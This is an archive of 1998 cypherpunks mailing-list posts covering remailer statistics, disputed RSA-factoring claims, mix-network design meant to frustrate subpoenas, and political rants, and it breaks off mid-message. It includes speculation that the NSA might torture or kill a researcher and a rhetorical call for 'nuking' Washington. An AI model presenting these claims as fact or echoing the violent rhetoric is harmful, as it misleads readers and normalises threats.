hera     goddesshera@juno.com             ------------  5:03:45  99.86%
nym      config@nym.alias.net             +*#**#**###       :34  95.82%
redneck  config@anon.efga.org             #*##*+#****      2:00  95.44%
mix      mixmaster@remail.obscura.com     +++ ++++++*     19:18  95.27%
squirrel mix@squirrel.owl.de              -- ---+---    2:34:19  95.16%
cyber    alias@alias.cyberpass.net        *++***+ ++      11:26  95.11%
replay   remailer@replay.com              ****   ***      10:06  94.93%
arrid    arrid@juno.com                   ----.------   8:50:34  94.41%
bureau42 remailer@bureau42.ml.org          ---------    3:38:29  93.53%
cracker  remailer@anon.efga.org           +  +*+*+*+      16:32  92.80%
jam      remailer@cypherpunks.ca          +  +*-++++      24:14  92.79%
winsock  winsock@rigel.cyberpass.net      -..-..----    9:59:18  92.22%
neva     remailer@neva.org                ------****+   1:03:02  90.39%
valdeez  valdeez@juno.com                               4:58:22 -36.97%
reno     middleman@cyberpass.net                        1:01:28  -2.65%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 19 Jan 1998 21:03:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: proving that one knows how to break RSA
Message-ID: <1.5.4.32.19980119125838.0074591c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:

>Oh, please.  Payne's so-called faster factorization algorithm was
>discussed on this list May 13.  See the archives under the thread title
>"Public Key Break Paper".  The algorithm is total garbage.  Payne is
>obviously a nut case who is setting himself up for a contempt of court
>charge.

We posted the notice about Payne's RSA paper. There's an
archive of his (and fellow Sandian Art Morales') NSA suit and
links to his papers :

   http://jya.com/whpfiles.htm

Perhaps Bill's a nut case, and if so, he's probably a bellweather of
other disaffected researchers in classified work who are being
trashed for refusing to continue Cold War violations beyond
the original conditions for signing secrecy agreements, and who
are being ostracized by those who want the perks to continue.

What folks like Payne are going to do with what they learned about
what the USG has been up to is a good question. And what the
USG will do to them if they start to tell is more so.

That's what Payne's NSA suit is about, and it may be more 
consequential than the all-too-sane Bernstein, Karn and Junger 
suits. That will depend on what Payne chooses to reveal in
spite of secrecy agreements.

We may never know what Bill knows about faulty cryptography
if DOE settles with him and Morales. Alternatively, he confesses 
to a fear of flying, for the reasons Dimitri states, based on what 
he says he knows of the insane accusations and actions of  the 
TLAs when their own comfort and security is threatened by an 
ex-insider.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 20 Jan 1998 00:01:43 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FYI: Jefferson Club: "A World of Strong Privacy: Promises and Perils of Encryption"
Message-ID: <v04003996b0e90661882c@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
Date: Fri, 16 Jan 1998 15:58:21 -0800
To: mac crypto list <mac-crypto@vmeng.com>
From: Vinnie Moscaritolo <vinnie@vmeng.com>
Subject: Fwd: FYI: Jefferson Club: "A World of Strong Privacy: Promises
 and Perils of Encryption"
Sender: <mac-crypto@vmeng.com>
Precedence: Bulk

>>The Jefferson Club is proud to present:
>>David Friedman, Professor of Law at Santa Clara University
>>to speak on
>>"A World of Strong Privacy: Promises and Perils of Encryption"
>>
>>Luncheon
>>Wednesday, February 25th
>>12:00 noon
>>Ming's Villa in Palo Alto
>>
>>Reserve your place at http://www.ipser.com/jeffersonclub.
>>
>>A major theme in discussions of the influence of technology on society has
>>been the computer as a threat to privacy. It now appears that the truth is
>>precisely opposite. Three technologies associated with computers, public key
>>encryption, networking, and virtual reality, are in the process of giving us
>>a level of privacy never known before. The U.S. government is currently
>>intervening in an attempt, not to protect privacy, but to prevent it.
>>
>>Professor Friedman will explain the technologies and demonstrate that current
>>developments, if they continue, will produce a world of strong privacy, a
>>world
>>in which large parts of our lives are technologically protected from the
>>observation of others. He will discuss the likely consequences,
>>attractive and
>>unattractive, of that change and provide a brief account of attempts by
>>the U.S.
>>government to prevent or control the rise of privacy.
>>
>>For a preview of the talk, see "A World of Strong Privacy: Promises and
>>Perils of
>>Encryption"
>>(http://www.best.com/~ddfr/Academic/Strong_Privacy/Strong_Privacy.html)
>>Come prepared with questions for Professor Friedman.
>>
>>For more information or to reserve your place, visit:
>>http://www.ipser.com/jeffersonclub
>>
>
>
>_


Vinnie Moscaritolo
http://www.vmeng.com/vinnie/
Fingerprint: 3F903472C3AF622D5D918D9BD8B100090B3EF042

     "You can get a lot more with a smile and a gun
     then a smile, alone."
			- Al Capone

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Mon, 19 Jan 1998 17:25:45 +0800
To: cypherpunks@cyberpass.net
Subject: Re: proving that one knows how to break RSA
Message-ID: <199801190915.KAA15874@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Dimitri Vulis <dlv@bwalk.dm.com> writes:
> Adam Back <aba@dcs.ex.ac.uk> writes:
> > Dimitri Vulis <dlv@bwalk.dm.com> writes:
> > > Bill Payne was with Sandia national lab (where they quite a bit of
> > > crypto work) Bill claims to have discovered a very fast
> > > factorization algorithm using shift registers, which he refuses to
> > > publish. While I haven't seen the algorithm, I believe he may well
> > > be right.
> >
> > Bill Payne's claim to having discovered a faster factorization
> > algorithm than the current state of the art, allows us to invoke the
> > oft discussed mechanisms for the author to prove this ability without
> > divulging the algorithm, and then proceed to sell the algorithm to the
> > highest bidder, whilst minimizing his chances of being killed.
> ...
> I believe Bill is genuinely afraid that if he published his algorithm,
> then he'll be killed. I don't know enough to judge how realistic his
> fear is. I've been involved in serious discussions of assassinations
> over smaller amounts of money than is at stake here. He displays great
> courage by saying anything at all at this point.

Oh, please.  Payne's so-called faster factorization algorithm was
discussed on this list May 13.  See the archives under the thread title
"Public Key Break Paper".  The algorithm is total garbage.  Payne is
obviously a nut case who is setting himself up for a contempt of court
charge.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 19 Jan 1998 17:33:53 +0800
To: Ulf Mller <ulf@fitug.de>
Subject: Re: Onion routing
In-Reply-To: <19980119013252.18949@ulf.mali.sub.org>
Message-ID: <Pine.BSF.3.96.980119102223.9263B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 19 Jan 1998, Ulf [iso-8859-1] Mller wrote:
> Does that mean that every onion router needs to maintain many
> encrypted links, or is there a more efficient solution?

To get any meaningful security, the user  has to control  the first OR.
Furthermore, it must be impossible to discern indiviual messages, meaning
connections being opened or  closed. Which requires Pipenet, possibly the
worst bandwidth burner ever  invented. :-)

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 20 Jan 1998 03:22:42 +0800
To: cypherpunks@Algebra.COM
Subject: On the LAM--Local Area Mixes
In-Reply-To: <19980119013252.18949@ulf.mali.sub.org>
Message-ID: <v03102800b0e941b7b909@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




SUMMARY

This post is about "lumping" of mix nodes to get a lot more mixing
bandwidth while also protecting against court-ordered seizures and
subpoenas. The idea is to have a dozen or more fairly cheap mix machines in
several apartments or offices connected with high-speed links, running
protocols not feasible over more expensive T1 and T3 sorts of links between
physically distant locations. Think of these concentrations as Local Areas
Mixes, or LAMs.


BACKGROUND

Early in the history of Cypherpunks, one of our schemes was to drastically
increase the number of nodes in the mix network by having many machines at
one physical site talking to each other at high speed over local networks.
A message would enter the physical site, bounce around to N machines, and
exit, perhaps going to other machines and sites, and back again, etc. (The
image was of perhaps 20 or 30 cheap PCs linked with Ethernet in a set of
apartments in Berkeley--obtaining search warrants or court orders to allow
monitoring of all 20 or 30 machines, scattered across several physical
addresses, would be "problematic.")

(This is still not a bad idea....lots of additional mixing entropy can be
gained this way, plus increased resistance against compromise of a single
remailer. Plus lots of headaches for any Scientologists or Christian
Crusaders or B'nai Brithers trying to shut down speech they don't like.)

Obviously, a list of machine names and public keys would have to be kept
current (modulo the frequency with which machines go down).  (BTW, how do
Mixmaster users actually decide which remaielers are reliable enough to
use? Or have the delays they wish? Do they use R. Levien's regular report,
or hit his URL?)


REMAILER MATH MODEL IS STILL LACKING

I don't believe anyone has publically analyzed "remailer math" in the
detail we would've expected by now. That is, analyzed the security (against
traceability) of having N nodes for M users communicating with remailers
having some operational model (number of messages in mix, "latency" (!),
etc.). We have commented for at least several years that this would make a
nice thesis for someone. I would've expected that this would by now be a
respectable research topic for "Crypto" papers.

(Much of the "analysis" of remailers has been of the seat-of-the-pants
type, with K mesages in a mix and  X bounces allgegedly leading to K ^ X
messages to be followed. But this analysis neglects correlation analysis of
sent/received messages, the pitiful number of messages flowing in the
overall network at any given time, and a bunch of other more subtle
effects. If Alice and Bob are using a remailer network to communicate, and
if an adversary has access to the packets flowing through the remailer
network--a big if--then statisical and probabalistic analysis can perhaps
reduce the entropies greatly. A better model is needed.)

Eric Hughes has expressed similar concerns, and presented a few tantalizing
details of how traceability can be extracted from mix networks using
Bayesian types of correlation analyses. (Alice and Bob being identified as
communicants through the patterns of sent and received packets, regardless
of the mixing between them.)

My reason for mentioning this here is that I think a more detailed analysis
of mix networks and the entropy and decorrelation seen would show the
advantages of having drastically more nodes, with various PipeNet and
BlackNet sorts of protocols running.


MAKING THE BEST USE OF BANDWIDTH

One of the motivations for the idea of having a lot of small machines at
some site is this: to reduce the network bandwidths needed for PipeNet
sorts of approaches.

Imagine this scenario. Concrete numbers are picked for easier visualization.

A set of offices in Berkeley has 20 low-cost machines running in 5 offices,
the offices being owned or leased by several organizations or individuals,
all legally separated. The 20 machines are all running either fixed
bandwidth (a la PipeNet) connections, or connections which never physically
leave the building and which can be inspected for taps. Additional
shielding of the cables might be a nice touch....optical fibers an even
nicer touch, as the tapping methods I know of require physical access to
the fiber, to do a tunnelling tap, or an actual break-and-splice. Ideally,
all or some of the boxes should be TEMPEST-protected, and/or
tamper-resistant.

I believe a sub-$500 cheap PC--with a 150 MHz Pentium--could be "hardened"
with $200 worth of additional copper or mu metal sheeting, placement inside
larger metal boxes, whatever. Or 10 such machines could cheaply be placed
in a locked Faraday cage, with a good lock on the door and video cameras
and such used for surveillance against black bag jobs. (*) In other words,
this network of mixes could be made very secure against nearly all
attackers. "All attackers" is a dangerous description, but I think the
costs of attacking the network undetectably could be made to cost a
prohibitive amount....

(* Though I tend to dislike PR stunts, imagine a "WebCam" aimed
continuously at this physical site, this Faraday cage, with a clock inside
ticking away, and maybe even a mechanical clock with clearly moving parts,
all so that an attacker could not easily spoof the image by replacing the
camera scene. This could generate interesting PR, as people "check the
security" of the site, and also get some education.)


MORE SUCH SUB-NETWORKS IN OTHER COUNTRIES

Now imagine the same sort of network of low-cost machines running in, say,
Amsterdam. With a fairly low bandwith connection to the Berkeley network.
(That is, not a leased line, just _regular_ usage of a normal link. For
example, a 100K packet attempted to be sent every 30 seconds or so, round
the clock. Exact details are not import...the idea being that external
watchers cannot detect patterns in the packet usage, a la PipeNet.)

There is, of course, no reason packets cannot also be bounced out to other
mixes, as selected by the user. And the sites in Berkeley and Amsterdam,
and elsewhere, may of course add their own bounces (as we all know, this is
always acceptable (*), and does not require the original sender to be
involved).  (* modulo reliability issues--if additional links are added,
they must not degrade overall realiability)

The original sender, Alice, of course will have complete say over the basic
routing, as it is she who selects the routing and constructs the chain of
encryptions. The idea of conglomerating mix nodes into physically close
spaces is not to take away any of her freedom to choose, but only to solve
the bandwidth and surveillance problems, by allowing her to bounce her
message amongst 20 machines in one site, bounce it to some remailers she
chooses, bounce it around to some sites she likes, and so on.


CHALLENGES FOR ATTACKERS

An attacker seeking to shut down the remailer sites will have a formidable
challenge:

-- court orders applicable to one apartment or office presumably will not
apply to other offices or addresses.

(Drug dealers often have stored drugs in one apartment while dealing them
from another, using a "rat line" to move the drugs between apartments. Last
I heard, search warrants cannot cover whatever sites raiders decide to
pick....this may've changed with the recent Supreme Court. In any case, a
"cyberspace rat line" can include wires snaking all throughout a large
building, making any search warrant focussed on a specific address or
person not applicable to sites in other parts of the building. Or in other
buildings completely (but still connected with high-bandwidth lines).

-- the machines in various locations should not have their locations noted.
(For example, the "Medusa mix" should not be identified, at least not in
general, as being upstairs in the Citizens for a Constitutional Process
offices. There is no "need to know" such things, and this makes
"propagation of search warrants" all the more problematic. )

-- the routing topology of the site may be an interesting area to look at.
Ideally, a "Linda"-like broadcast topology (all machines see all packets,
like messages in a bottle thrown into the "sea") could have certain
advantages, analogous completely to a message pool or Blacknet topology.

(This would make propagation of subpoenas vastly more difficult.)

-- again, in a physically close space, such high-bandwith methods are
easier to implement than in a physically spread out space (where bandwidth
costs a lot more).


RICO?

On the other hand, while ordinary subpoenas might be difficult to spread
across all of the machines, the clustering of many machines in one region
might be seen as a "conspiracy" to do something the Authorities don't like,
and thus be a RICO (Racketeer-Influenced and Corrupt Organizations, of
course) violation. It might be the Mother of all Steve Jackson Games Raids,
but one could imagine Unhappy Authorities seizing _all_ machines. (There
are aspects of the ECPA which may mitigate against this, though. A la the
Alcor case in Riverside, CA, 10 years ago.)


NEW TOPOLOGIES AND BETTER USE OF BANDWIDTH

Purists will point out that there is nothing that a network of N machines
in some physically close location cannot do that those same N machines
scattered in multiple legal and national jurisdictions cannot do just as
well.

Well, except for a few things:

A. Bandwidth. Local machines can be connected with PipeNet sorts of
connections, with vast amounts of cheap bandwidth.

B. Security against Tampering or Surveillance. While it may be possible for
NSA packet sniffers at major routing points to sniff mix traffic (recall
the work of Shimomura on sniffers, and the increasing concentration of
packets at the half dozen biggest network routing nodes, like MAE West),
local LANs are resistant to such sniffings. And to physical taps.  (These
dangers will be lessened if we ever get to where all machine to machine
traffic is routinely encrypted, a la SWAN, but we're not there yet by any
strech.)

C. New Topologies. Message pools, Linda-like "seas," and PipeNet are all
more feasible on such LAMs. As with the brain, which as multiple levels of
organization, an overall mix network consisting of subnetworks and
clusterings probably offers a richer set of behaviors than just one overall
loosely-couple set of mix nodes.

(I haven't mentioned this, but a LAM could be used for some very
high-bandwith mixing, like audio telephony and even video....modulo the
Alice-Bob correlation attacks I mentioned earlier.)


Anyway, I ought to stop for now. There are a lot more things to mention,
and issues to resolve.

But I think we need to once again consider such strategies. Having some
very high bandwidth "local mix networks" opens up some interesting
possibilities. Running PipeNet and BlackNet sorts of systems locally, for
example. Making issuance and serving of subpoenas very problematic, for
another example.

Your thoughts are welcome.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 20 Jan 1998 04:32:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: proving that one knows how to break RSA
In-Reply-To: <iV7iJe30w165w@bwalk.dm.com>
Message-ID: <199801191148.LAA00798@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Dimitri Vulis <dlv@bwalk.dm.com> writes:
> I believe Bill [Payne] is genuinely afraid that if he published his
> algorithm, then he'll be killed. I don't know enough to judge how
> realistic his fear is.

There are a few other scenarios which suggest he may be at risk even
if he doesn't publish.  Firstly if we argue on the basis that he does
have a fast algorithm:

- if the NSA thinks they already know the algorithm he has discovered,
  they may kill him anyway to prevent disclosure to others

- the NSA may kidnap him, inject him with various truth drugs, and
  generally torture the information from him, and then kill him

Insurance in the form of a disclosure procedure in the event of his
premature death will reduce his risk of being killed.

Secondly if we argue on the basis that Bill doesn't have a fast
factoring algorithm, or is mistaken about the complexity of his
algorith:

- if the NSA thinks his claim credible they may again kidnap him and
  attempt to extract this algorithm from him.  They may then kill him
  to prevent him talking about them torturing him if he reveals an
  algorithm, or appears not to have an algorithm

He appears to be in greater risk if falsely claiming he has a fast
algorithm if his claim appears credible to the NSA -- his insurance in
the form of a fall back public disclosure procedure in event of his
premature death no longer helps him.

In general it seems generally a dangerous claim to make.

> I've been involved in serious discussions of assassinations over
> smaller amounts of money than is at stake here. He displays great
> courage by saying anything at all at this point.

If it is true, it is a big deal indeed.

> Yes, it would be most interesting/impressive if Bill demonstrated his
> ability to factor using some of the published chalenges.

Another target Bill might be amused to factor if we can obtain it is
the NSA's public key embedded in lotus notes implementations.  Should
fit in with his interest in showing incompetence on the part of the
NSA.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 20 Jan 1998 00:54:24 +0800
To: cypherpunks@cyberpass.net
Subject: More Software Controls
Message-ID: <1.5.4.32.19980119165256.00b68668@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Denise Caruso reports today in the NYT on 
upcoming copyright legislation that would prohibit 
circumventing any copyright protection on digital 
works. Quote:

   Many products on the market would qualify for
   circumvention devices. These include software
   that allows systems managers to gain access
   to computers when users lose their passwords
   and any device used to test the strength of
   computer security -- products that cannot be
   tested without trying to break protection
   technology.

There's also a report on The WWW Consortium's
vote a few days ago to include the PICS standard for 
Web infrastructure and the vote's import for censorship.
The report notes that technologists are now making
decisions about public policy once dominated by
lawyers, and defending the self-serving practice much 
the same: it's for the public good.

http://www.nytimes.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Tue, 20 Jan 1998 07:04:30 +0800
To: Adam Back <Ross.Anderson@cl.cam.ac.uk
Subject: Re: (eternity) Covert Superhighway - the missing component?
In-Reply-To: <E0xsPbf-0002vu-00@heaton.cl.cam.ac.uk>
Message-ID: <v03102805b0e96e869fb3@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>When people can buy a T1 to their house for 2,000/yr instead of
>20,000, we will stand a better chance.

A few U.S. ISPs are offering xDSL at $600/mo.  My local cable network, in Las Vegas, is offering bi-directinal T1 rates, with a guaranteed LOS, at $600/mo.  Once these technologies get rolling, in a year ot two, rates are likely to drop below $200/mo.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 20 Jan 1998 05:39:37 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Congress' *real* job...
In-Reply-To: <19980119202001.27861.qmail@nym.alias.net>
Message-ID: <v03102801b0e971dd0917@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:20 PM -0800 1/19/98, lcs Mixmaster Remailer wrote:

>Be careful what you wish for. This Congress is far more likely to pass
>amendments nullifying the 2nd, the 1st, the 6th, the 4th, and others. And
>they'll probably rewrite the 13th to read "no involuntary servitude...unless
>we say so."

Indeed. The last thing we need is a "Constitutional Convention." Very few
liberties would survive a vote by the herd and their designated top steers.

We already have growing restrictions on the First ("hate speech"), an
almost complete gutting of the Second (bans on guns, licensing,
confiscations), and the Fourth has become a joke (try reciting the 4th to
the ninja raiders bursting into your bedroom at 4 a.m., with no knocks and
no presentation of a search warrant). I guess we're still protected from
troops being quartered in our homes, though. (But look at the emergency
powers FEMA has acquired and notice that hotels, offices, and even private
homes may in fact be comandeered in an increasing number of situations.)

As for the 13th, if "the draft" (forced conscription of young men to be
cannon fodder, to help rebuild inner cities burned down by residents, to
"be all that they can be") is not involuntary servitude, what is?

And if the forcible placement of persons with certain genetic backgrounds
into concentration camps during World War II was not involuntary servitude,
what is?

And if the sequestration of 18 innocent citizens in a special hotel for the
10 months of a bullshit trial is not involuntary servitude, what is? (The
jurors each did about the same time O.J. did, and collectivelly, 15 times
more.)

And if the imprisonment of some for eating an unapproved food item or for
the growing of an unapproved crop is not involuntary servitude, what is?

(And I don't necessarily mean drugs, although marijuana was of course grown
and consumed by Jefferson, Washington, etc. I could also be referring to
the various farm laws which "regulate" who can grow peanuts, who can grow
rice, and how much, etc. "Grow a peanut, go to jail.")

And if working for the government for the first six months of every year
("tax freedom day" is now in June) is not involuntary servitude, what is?

With perhaps locally good intentions for each of these various laws, this
creaping featurism of American government has vitiated the original Bill of
Rights. Not completely, but getting there.

The Founders and their friends in the colonies would be shocked to learn
that half of all earnings go to fund various government boondoggles, that
the "King's Men" are free to raid homes in pre-dawn hours without
presenting the occupants with search warrants, that various Emergency
Powers have been acquired (though not constitutionally) by the Executive to
seize control of transportation, communication, production, and
distribution systems, and that persons of certain ethnic makeup can be
imprisoned for several years without due process.

They would call for the nuking of Washington as the first step in the New
American Revolution.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Tue, 20 Jan 1998 02:46:02 +0800
To: platypus@acmeonline.net
Subject: Re: (eternity) Re: remailer resistancs to attack
In-Reply-To: <Pine.LNX.3.93.980119192756.205C-100000@shirley>
Message-ID: <Pine.SUN.3.96.980119133722.26286D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 19 Jan 1998, ? the Platypus {aka David Formosa} wrote:

> How would this be implermented.  If you are able to trace backwards so you
> know who to notify then you don't have anonminity.


It could be done if the remailer software is rewritten.  When you send a
message, include instructions for the last remailer to write a message to
either usenet or a web page on the same net as the remailer with a sender
selected id.  Have these pooled and posted every day/week, etc...

If your mail bounces it you'll know by reading a page off a server, or a
message off usenet... 


i.e. for the last one in the chain
::Request bounce "xyzzy12345"

Dont post anything other than the bounce strings to the world.  (i.e.
don't post the intended recipient's name, etc...)


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Tue, 20 Jan 1998 04:02:31 +0800
To: Tim May <tcmay@got.net>
Subject: RICO & Seizures (Was: Re: On the LAM--Local Area Mixes)
In-Reply-To: <v03102800b0e941b7b909@[207.167.93.63]>
Message-ID: <199801192011.PAA32294@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102800b0e941b7b909@[207.167.93.63]>, on 01/19/98 
   at 11:13 AM, Tim May <tcmay@got.net> said:

>RICO?

>On the other hand, while ordinary subpoenas might be difficult to spread
>across all of the machines, the clustering of many machines in one region
>might be seen as a "conspiracy" to do something the Authorities don't
>like, and thus be a RICO (Racketeer-Influenced and Corrupt Organizations,
>of course) violation. It might be the Mother of all Steve Jackson Games
>Raids, but one could imagine Unhappy Authorities seizing _all_ machines.
>(There are aspects of the ECPA which may mitigate against this, though. A
>la the Alcor case in Riverside, CA, 10 years ago.)

Awhile back I recall reading something about about equipment confication
and that the governemnt was prohibited from conficating the equipment of a
publisher (ie the FED's can't walk in and shut down the NYT by taking
their printing presses).

Can anyone confirm that such a protection exsists? References to any
relevent court cases would be appreciated. Also any information reguarding
on what qualifications one must meet to qualify for such protection.

Perhaps we could set up a CP/Mixmaster newsletter and at least keep the
SOB's from stealing the equipment. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: He who laughs last uses OS/2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMOhtY9Co1n+aLhhAQF4eAQAgSi9+MTLfq5nFjc+Yz5FzVh+dpL5I5Hv
//EetqhieKyB3o2TzR7B8t1GyJcNKpDYp1N9n+bQ8yjYzffR2M+3p3p3kVPFpQ5S
Zx4L6mEpn9rUoKNDz4YgcXbrpMzenWw20Rxg4XywmtDAoPReK75JxGskJZQUpqSc
ykDrukOiQBg=
=hO3/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Tue, 20 Jan 1998 06:42:42 +0800
To: Markus.Kuhn@cl.cam.ac.uk
Subject: Re: Locating radio receivers
In-Reply-To: <E0xtbs7-0004Rk-00@heaton.cl.cam.ac.uk>
Message-ID: <199801192155.NAA00465@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain



> Kay Ping wrote on 1998-01-16 22:02 UTC:
> > Radio links are perfect for hiding the location of receivers.
> 
> Actually, this is only true for extremely carefully shielded military
> receivers and not for normal radios. Every receiver contains a local
> oscillator to bring the signal down to intermediate frequency (IF), which
> is emitting EM waves itself. In addition, the IF signal is emitted
> as well.
> 
> As Peter Wright reported in his autobiography, British counterintelligence
> (MI5) used vans and planes already in the 1950s to detect spys while
> they received radio communication messages from Moscow and to protocol,
> which frequency bands the embassies were monitoring (operation RAFTER).
> Efficient receiver detection is an active process: You send out short
> bursts of a wideband jamming signal and try to find the downtransformed
> intermediate frequency equivalent of your burst in the compromising
> emanations of the receiver. This way, you get not only the location of
> the receiver, but also the precise frequency to which it is tuned.
> 
> Locating radio receivers within a radius of many hundred meters this way
> was already state of the art in the spook community over 40 years ago,
> so you can safely assume that with digital signal processing, the
> performance parameters of modern systems have been increased
> significantly. Sending out spread-spectrum style pseudo-noise signals
> in the active probing bursts could give you in modern receiver detectors
> a considerable signal gain.
> 
> Markus

Hi,

I talked to some RF guys about the RAFTER attack about a year ago.
Their opinion was that since modern receivers have GaAs FET mixers,
they don't leak the LO or IF out the antenna like the old fashioned
inductor based mixers did.

This should be trivial to confirm with a spectrum analyzer.

Eric





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Tue, 20 Jan 1998 06:35:43 +0800
To: Kay Jones <cypherpunks@toad.com
Subject: Re: Eternity service??
In-Reply-To: <34C3C17A.F464F403@vvm.com>
Message-ID: <3.0.5.32.19980119142119.007d3610@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 03:11 PM 1/19/98 -0600, Kay Jones wrote:
>I am writing to you: Recently I was to coach a good friend of mine
>through her labor and birth. She very much wanted a natural birth and
>had written a very specific birth plan and had planned on signing
>waivers to release the hospital and docs from any legal action if

Wait 18 years, then her child can sue the hospital.

>anything went wrong. When we went to the hospital, the midwife on duty
>threw down her birth plan and told her that her child would be delivered
>on HER terms (the midwife's) or not at all. She literally forced me to
>leave my friend, and then had her physically restrained to insert IV's

Not very assertive, are you folks?

>and apply monitors which my friend had NOT consented to, and in fact had
